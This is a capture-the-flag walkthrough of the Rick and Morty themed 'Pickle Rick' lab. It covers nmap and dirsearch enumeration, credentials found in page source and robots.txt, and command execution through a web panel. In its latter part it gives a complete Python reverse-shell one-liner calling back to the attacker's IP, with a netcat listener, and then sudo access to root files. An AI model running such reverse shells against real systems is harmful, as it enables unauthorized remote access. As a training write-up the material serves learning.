Pickle Rick

Pickle Rick is a Rick and Morty themed challenge that requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a picke. No information related to the show is required.

On the first page, there is nothing worth looking at. I tried clicking around the picture a bit to see if they lead to a link but nothing of that sort. Next step was to inspect element and view the source. On doing so the very first thing visible was:

As we can see, the username is important and we just keep that in mind.

Username: R1ckRul3s

We do not see any other useful information via the inspect element. Next step, enumeration. First, we try to do it using nmap which gives us the ports which are open

nmap -A <ip address>

and you get the output as:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-24 20:54 IST
Nmap scan report for 10.10.191.134
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:26:28:e2:08:ac:c3:90:c0:89:05:f1:a0:13:25:bd (RSA)
|   256 ee:03:58:01:26:f9:78:ce:44:8a:12:01:f6:83:ba:1f (ECDSA)
|_  256 c8:ce:f3:b3:65:32:cd:20:60:24:f2💿63:eb:bc:06 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.26 seconds

As you can see, only 2 ports are open, 22 and 80. I tried going to both of them by <ip address>/<port num> but there was nothing useful out there. Still a good thing to know.

Next up, we try to enumerate better. dirsearch (https://github.com/maurosoria/dirsearch) is a really cool tool which you can download which can brute force directories, files etc via command-line in the specified webservers. Once you have installed it in your system just type in:

python3 diresearch.py -u http://<ip adress>

It will take about 2-3 minutes to get the output.

Now, there are a lot of files that it has shown, most of which are hidden and hence unimportant. The ones may be important are the ones which are highlighted by the tool, hence we start checking them out. First up, lets go to the assets directory mentioned.

Honestly, this was a bit dissapointing, there was nothing of use here :p. If you want go check out all the different files mentioned and you would probably come to the same conclusion. Next up, lets go check out the index.html. Uh well, that just takes us back to the home page. Next one. login.php. This takes us to a login page! Remember the username we found in the source? This might be where we need to use it! Now we need to figure out the password. I checked the source code of this page as well and found nothing interesting in it. Lets go to the next page, robots.txt.

Boom! We find <password> written on this page! Now lets try to put that in as credentials and see where this leads us.

We come on to portal.php which shows us a command pannel! How exciting. Go around the website a bit, click on different tabs. Nothing of use is seen there either. So the main key to solving this puzzle is via the command pannel. Try typing in ls in the command and see the answers.

This is nice! there are two files which immediately look pretty interesting, Sup3rS3cretPickl3Ingred.txt and clue.txt. Lets check them out by cat.

If you did try out the command cat, you probably hit a wall telling you that the command has been disabled and you must try some other way to retrieve the files. Now, simple google searches would probably reveal multiple different methods of displaying the files without using cat at all, but since that is against the spirit of the room I will skip over that :p

So we have a command line where the website is not allowing us to use some commands. Lets see if it allows us to use python to get the reverse shell on our temrinal. Try typing in python or python3. You would observe that it does not allow python but allows python3. Boom, now we just need to execute the command to get the reverse shell.

Here is a cheatsheet displaying different reverse shell commands: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

For the python one, just remember that the ‘attackers ip’ is our ip adress, which you can easily google on how to get. And specify any port that you want to. Before executing the command, just type in:

nc -nlvp <port number>

Let this command run in your terminal and copy the following as mentioned in the cheatsheet:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR IP>",<PORT NUMBER>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Type this in the command line in the website and you would see the shell get connected in your terminal. 10.17.9.4

Well, now our cat works! Just cat out the Sup3rSrcretPickl3Ingred.txt file and you will have the first answer. Next up, cat the clue.txt. This will tell you to just look around the file structures for different text files.

Honestly, the “hacking” part of the room is done here, now you just need to find the files which is easy enough. I will give you some hints to do that, but imo there is no need for more explanations.

For second clue: check out the home directory, might find something interesting there :p For third clue: check out the root directory using sudo command!

And boom, you are done!